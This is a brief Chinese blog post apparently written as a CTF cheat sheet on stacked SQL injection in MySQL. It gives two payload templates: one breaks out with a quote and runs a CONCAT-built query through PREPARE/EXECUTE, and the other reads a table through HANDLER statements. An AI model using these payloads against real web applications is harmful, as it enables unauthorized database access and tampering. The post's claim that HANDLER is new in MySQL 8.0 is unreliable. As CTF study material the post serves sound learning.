首页 > 技术文章 > ctf堆叠注入总结(持续更新)

lixiongji 2020-10-30 10:20 原文

第一种

1';USE db_name;SET @sql=CONCAT('sql contents');PREPARE stmt_name FROM @sql;EXECUTE stmt_name;

 

第二种

1';HANDLER table_name OPEN;HANDLER table_name READ [NEXT|FIRST];HANDLER table_name CLOSE;

HANDLER语句是mysql8.0的新特性,详情请查阅 https://dev.mysql.com/doc/refman/8.0/en/handler.html

推荐阅读